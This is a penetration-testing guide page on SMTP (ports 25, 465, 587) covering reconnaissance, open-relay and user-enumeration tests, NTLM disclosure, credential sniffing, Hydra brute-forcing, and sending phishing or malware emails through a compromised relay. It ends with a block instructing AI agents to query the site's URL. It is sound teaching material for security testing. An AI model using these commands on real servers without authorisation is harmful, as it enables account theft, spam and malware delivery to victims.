# SMTP/s - Port 25,465,587

<details>

<summary>Support VeryLazyTech 🎉</summary>

* Become VeryLazyTech [**member**](https://buymeacoffee.com/verylazytech/membership)**! 🎁**
* **Follow** us on **Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**,** **Github** [**@VeryLazyTech**](https://github.com/verylazytech)**, and Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.**
* Visit our [**shop** ](https://buymeacoffee.com/verylazytech/extras)for e-books and courses.  📚
* Support us and [**buy me a coffee**](https://buymeacoffee.com/verylazytech)**. ☕**

</details>

SMTP (Simple Mail Transfer Protocol) is a core component of the internet's email infrastructure, responsible for sending and receiving emails. It's a protocol within the TCP/IP suite, frequently working alongside POP3 or IMAP to store emails on servers and allow users to access them. Despite its widespread use, SMTP has certain vulnerabilities that make it a popular target for penetration testers and hackers.

## SMTP Commands:

**HELO** It’s the first SMTP command: is starts the conversation identifying the sender server and is generally followed by its domain name.

**EHLO** An alternative command to start the conversation, underlying that the server is using the Extended SMTP protocol.

**MAIL FROM** With this SMTP command the operations begin: the sender states the source email address in the “From” field and actually starts the email transfer.

**RCPT TO** It identifies the recipient of the email; if there are more than one, the command is simply repeated address by address.

**SIZE** This SMTP command informs the remote server about the estimated size (in terms of bytes) of the attached email. It can also be used to report the maximum size of a message to be accepted by the server.

**DATA** With the DATA command the email content begins to be transferred; it’s generally followed by a 354 reply code given by the server, giving the permission to start the actual transmission.

**VRFY** The server is asked to verify whether a particular email address or username actually exists.

**TURN** This command is used to invert roles between the client and the server, without the need to run a new connaction.

**AUTH** With the AUTH command, the client authenticates itself to the server, giving its username and password. It’s another layer of security to guarantee a proper transmission.

**RSET** It communicates the server that the ongoing email transmission is going to be terminated, though the SMTP conversation won’t be closed (like in the case of QUIT).

**EXPN** This SMTP command asks for a confirmation about the identification of a mailing list.

**HELP** It’s a client’s request for some information that can be useful for the a successful transfer of the email.

**QUIT** It terminates the SMTP conversation.

## **Reconnaissance and Information Gathering**

**Subdomain Enumeration & DNS Misconfigurations**: Before jumping into SMTP directly, expand the reconnaissance section to include subdomain enumeration for deeper target discovery. Tools like `amass` or `sublist3r` could be used here to identify potential SMTP servers:

```bash
amass enum -d <target-domain>
```

Subdomains could potentially host misconfigured or less secure SMTP servers.

### **1.1. Identify Open SMTP Ports**

Start by using tools like **Nmap** to identify open ports, typically 25 (SMTP), 465 (SMTPS), and 587 (Submission over TLS):

```bash
nmap -p25,465,587 --open <target-IP>
```

Using Metasploit:

```
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target-IP>
set THREADS 10
run
```

### **1.2. MX Record Discovery**

Discover Mail Exchanger (MX) records for the target organization:

```bash
dig +short mx <target-domain>
```

This will return the mail servers responsible for receiving emails for the domain.

### **1.3. Banner Grabbing**

Banner grabbing helps identify the SMTP server version, which could contain known vulnerabilities. Use **Netcat** or **OpenSSL** to connect and grab the banner:

```bash
nc -vn <target-IP> 25
```

For secure connections:

```bash
openssl s_client -starttls smtp -connect <target-IP>:587
```

Using Metasploit:

```bash
use auxiliary/scanner/smtp/smtp_version
```

**Look for:**

* **Server versions**
* **Mail server type (Microsoft ESMTP, Postfix, Exim, etc.)**
* **Any other information leaks (internal hostnames)**

***

## **Enumeration and Vulnerability Discovery**

### **2.1. Enumerate SMTP Commands**

Use **Nmap's** `smtp-commands` script to enumerate supported SMTP commands. This may give insights into how to interact with the server, and whether certain attack vectors (like relay attacks) are possible.

```bash
nmap -p25 --script smtp-commands <target-IP>
```

### **2.2. Open Relay Testing**

An open SMTP relay can be abused to send spam or phishing emails without authentication. Use the **smtp-open-relay** Nmap script to test for this vulnerability:

```bash
nmap -p25 --script smtp-open-relay <target-IP>
```

Using Telent:

```
telnet <target-IP> 25
helo attacker.com
mail from: attacker@attacker.com
rcpt to: victim@target.com
data
This is a test email to verify open relay.
.
quit
```

If the server is vulnerable, you will be able to send emails without being an authenticated user.

### **2.3. Verify Users**

SMTP servers can sometimes allow username verification using **RCPT TO** and **VRFY** commands, revealing valid email accounts on the system.

```bash
telnet <target-IP> 25
HELO test.com
MAIL FROM: attacker@attacker.com
RCPT TO: victim@target.com
```

If you get a **250 OK** response, the email address is valid.

You can automate this using tools like **smtp-user-enum**:

```bash
smtp-user-enum -M VRFY -U users.txt -t <target-IP>
```

***

## **Exploiting Information Disclosure and Misconfigurations**

### **3.1. Internal Server Name Disclosure**

Some SMTP servers may leak internal server names in the response to commands like `MAIL FROM:`. For example:

```bash
MAIL FROM: attacker@example.com
```

Response:

```arduino
250 me@INTERNAL-SERVER.local...Sender OK
```

This internal information could be used in later attacks.

### **3.2. NTLM Authentication Information Disclosure**

If the SMTP server supports **NTLM authentication**, you can extract sensitive information by interacting with the authentication process.&#x20;

```bash
nmap --script smtp-ntlm-info.nse -p25 <target-IP>
```

Using Metasploit:

```
use auxiliary/scanner/smb/smb_ntlm_credential_dump
set RHOSTS <target-IP>
run
```

***

## **Password Cracking and Credential Harvesting**

### **4.1. Sniffing Cleartext Credentials**

SMTP running on port 25 (non-SSL) may allow you to capture email credentials via network sniffing using **Wireshark** or **tcpdump**. Look for cleartext `AUTH LOGIN` or `AUTH PLAIN` credentials.

**Wireshark** filter:

```bash
tcp.port == 25 && tcp contains "AUTH"
```

### **4.2. SMTP Brute-Forcing**

If authentication is required but weak credentials are suspected, use brute-forcing tools such as **Hydra:**&#x20;

```bash
hydra -L users.txt -P passwords.txt smtp://<target-IP> -V
```

***

## **Sending Malicious Emails (Post-Exploitation)**

Once access is gained to the SMTP server or an open relay is found, it is possible to send phishing emails, malware, or perform further reconnaissance.

### **5.1. Send an Email from Linux Command Line**

```bash
sendEmail -t victim@target.com -f attacker@malicious.com -s <target-IP> -u "Urgent" -m "Please open the attached document" -a /path/to/malware.pdf
```

Or use **Swaks** to send phishing emails:

```bash
swaks --to victim@target.com --from attacker@malicious.com --header "Subject: Urgent" --body "Click this link" --server <target-IP>
```

### **5.2. Phishing with EICAR Test File**

Test antivirus defenses by sending an EICAR test file to see if the server scans attachments for malware. This helps identify email gateway filtering systems:

```bash
sendEmail -t victim@target.com -f attacker@malicious.com -s <target-IP> -u "Test" -a /path/to/eicar.com
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.verylazytech.com/network-pentesting/smtp-s-port-25-465-587.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.